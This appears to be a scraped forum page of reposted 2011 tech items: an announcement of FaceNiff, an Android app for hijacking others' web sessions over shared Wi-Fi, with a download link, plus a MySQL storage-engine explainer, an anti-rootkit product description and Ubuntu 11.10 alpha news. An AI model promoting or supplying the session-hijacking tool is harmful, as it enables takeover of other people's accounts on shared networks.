    Sniff and intercept web session profiles on Android 02 June 2011. FaceNiff is an Android app that allows you to sniff and intercept web session profiles over the Wi-Fi that your mobile is connected to. It is possible to hijack sessions only when Wi-Fi is not using EAP, but it should work over any private networks (Open/WEP/WPA-PSK/WPA2-PSK). It's kind of like Firesheep for Android and it works on WPA2. A rooted phone is required and keep in mind that if the user uses SSL this application won't work. Supported services: FaceBook Twitter Youtube Amazon Nasza-Klasa. Here's a video of FaceNiff for Android in action on LG Swift 2X: Confirmed to work on: HTC Desire CM7 Original Droid/Milestone CM7 SE Xperia X10 Samsung Galaxy S Nexus 1 CM7 HTC HD2 LG Swift 2X LG Optimus Black - original rom LG Optimus 3D - original rom Samsung Infuse. Download: http://faceniff.ponury.net/ Sursa: Sniff and intercept web session profiles on Android
  23. Nytro
    Difference between InnoDB and MyISAM in MySQL Posted by Sachin Khosla, on November 15, 2010 MyISAM and InnoDB are two most commonly used storage engines of MySQL database. However, MyISAM is the default storage engine chosen by MySQL database, when creating a new table. The major differences between these two storage engines are : InnoDB supports transactions which is not supported by tables which use MyISAM storage engine. InnoDB has row-level locking, relational integrity i.e. supports foreign keys, which is not possible in MyISAM. InnoDB ‘s performance for high volume data cannot be beaten by any other storage engines available. Tables created in MyISAM are known to have higher speed compared to tables in InnoDB. But since InnoDB supports volume, transactions, integrity it’s always a better option which you are dealing with a larger database. It is worth mentioning that a single database can have tables of different storage engines. File structure MyISAM stores each table on disk with three files whose names begin with same as table name. These files have different extensions to differentiate their purpose. A .frm files stores the table format, and a .MYD (MYData) file stores the data of the table. If the table has indexes then these are stored in the .MYI (MYIndex) files. On the other hand, InnoDB tables and their indexes are stored in the tablespace, which consists of several files. That is why InnoDB tables can be very large and can store large volume of data. The InnoDB storage engine maintains its own buffer pool for caching data and indexes in main memory. Check the engines being used for existing tables So these are the main differences between these two engines. You can specify in the query that which engine is to be used while creating the table. CREATE TABLE test name varchar(30) ENGINE = InnoDB; Since MyISAM is the default engine assigned when creating a table, so you need not to specify it, if you are planning to use MyISAM. This rule holds good, if you have not changed anything in the configuration. To check the engines of already existing tables, use the following query. It will list all the existing tables which are present in the current database, with their engines specified. show table status; If you want to view the status of a particular table, then use the following query, show table status where Name = ‘tablename’; Hope that helps. Stay Digified !! Sachin Khosla Sursa: DigiMantra » Difference between InnoDB and MyISAM in MySQL
  24. Nytro
    NoVirusThanks Anti-Rootkit Free NoVirusThanks Anti-Rootkit is a sophisticated low-level system analysis tool whose main goal is to detect the presence of malware and rootkits. Hidden processes, hidden drivers, stealth DLL modules, code hooks etc. are just a few of the objects which can be detected in user space and system memory. Quick Report Scan (Easy Mode) Detect SSDT & Shadow SDT Hooks Detect Interrupt Descriptor Table (IDT) Hooks Detect SYSENTER Handler Hooks Detect Stealth IRP Hooks Analyze Master Boot Record (MBR) Detect Kernel Callbacks Detect Kernel-Mode & User-Mode Hooks Detect Hidden Drivers + Hardcore Scan Detect Hidden Processes Processes Behavioral Analysis Detect Windows Message Hooks Hosts File Manager Browser Helper Objects Manager AppInit_DLLs Manager NoVirusThanks Anti-Rootkit is a must-have for anyone seeking true 32-bit Windows NT kernel security and system threat analysis. The vast detection range of industry standard rootkits is truly amazing especially without compromising system stability even in the most hostile, malware-plagued environments. It is recommended to use this software by experienced users. We offer a 1 license multi-user solution meaning all you need is 1 license per PC and all users may access the software. NoVirusThanks Anti-Rootkit can be purchased for only $19.99 USD. The 1 PC license is lifetime, you do not need to renew the license each year for the version of the product you have bought, we provide free updates for minor revisions. We offer also a free edition of our product, with some limitations in the features (view the comparison table above), that can be downloaded at the bottom of this page, the license is free for personal use only, and is not for business or commercial use. NoVirusThanks Anti-Rootkit is compatible with the following 32-bit Microsoft Windows Operating Systems (OS): Windows XP, Windows Server 2003, Windows Vista and Windows 7 Preview: NoVirusThanks Anti-Rootkit (Preview) - Anti Rootkit and Anti Malware – Security Software and Services - NoVirusThanks Video: Multiple Rootkit Infection Test Download: http://downloads.novirusthanks.org/files/NVTArk_Free_Setup.exe Sursa: NoVirusThanks Anti-Rootkit Free - Anti Rootkit and Anti Malware – Security Software and Services - NoVirusThanks
  25. Nytro
    Ubuntu 11.10 Alpha 1 Has GNOME 3, Firefox 5, Linux Kernel 2.6.39 We are proud to announce today, June 2nd, that the first Alpha version of the upcoming Ubuntu 11.10 (Oneiric Ocelot) operating system is now available for download. As usual, we've grabbed a copy of it in order to keep you up-to-date with the latest changes in the Ubuntu 11.10 development. While all Ubuntu are still discovering and enjoy the brand-new Ubuntu 11.04 (Natty Narwhal) operating system, somewhere deep in the Ubuntu headquarters, the Canonical developers are working on the next major update for their popular Linux distribution. What's new in Ubuntu 11.10 Alpha 1? Well, the big news is that the GNOME 3 desktop environment has been finally implemented in the Ubuntu operating system, so users can grab a copy of it and test it deeply. Just remember that it's a development release and not all things work as expected! Also new in Ubuntu 11.10 (Oneiric Ocelot) is Linux kernel 2.6.39, which brings lots of new drivers and support for the latest hardware components. As you can see from the screenshot below, if you don't have 3D video drivers, Ubuntu 11.10 will fallback to Unity 2D The following packages are featured in Ubuntu 11.10: Mozilla Firefox 5 Beta, Transmission 2.13, NetworkManager 0.9, GNOME Orca 3.0, Nautilus 3.0.2, GTK3, GCC 4.6, and gsettings instead of gconf. Ubuntu Server 11.10 Alpha 1 contains updated Orchestra elements and Openstack components. Also, the the delta with Debian was reduced in many areas. What's new in Kubuntu 11.10 Alpha 1? Well, the first Alpha version of Kubuntu 11.10 is build on top of KDE Software Compilation 4.6.3. The Muon Software Center is now used by default for package management. KDE PIM 4.4.11 is also included in this release. What's new in Xubuntu 11.10 Alpha 1? Well, the first Alpha version of Xubuntu 11.10 features the beautiful Xfce 4.8 desktop environment. There are no significant changes in this release. On October 13th, 2011, Ubuntu 11.10 (Oneiric Ocelot) will become the fifthteenth release of the Ubuntu operating system. See you again in three months (June 30th), for the second Alpha version of the upcoming Ubuntu 11.10 (Oneiric Ocelot). The Oneiric Ocelot Release Schedule: June 2nd, 2011 - Alpha 1 release June 30th, 2011 - Alpha 2 release August 4th, 2011 - Alpha 3 release September 1st, 2011 - Beta 1 release September 22nd, 2011 - Beta 2 release October 13th, 2011 - Final release of Ubuntu 11.10 Download Ubuntu 11.10 Alpha 1 (Oneiric Ocelot) right now from Softpedia. Download Ubuntu Server 11.10 Alpha 1 (Oneiric Ocelot) right now from Softpedia. Download Ubuntu Enterprise Cloud 11.10 Alpha 1 (Oneiric Ocelot) right now from Softpedia. Download Kubuntu 11.10 Alpha 1 (Oneiric Ocelot) right now from Softpedia. Download Xubuntu 11.10 Alpha 1 (Oneiric Ocelot) right now from Softpedia. Download Edubuntu 11.10 Alpha 1 (Oneiric Ocelot) right now from Softpedia. Remember that this is an alpha release and it should NOT be installed on production machines. It is intended to be used for testing purposes only. Please report bugs to the Ubuntu Bug Tracker. Sursa: Ubuntu 11.10 Alpha 1 Has GNOME 3, Firefox 5, Linux Kernel 2.6.39 - Softpedia
×
×
  • Create New...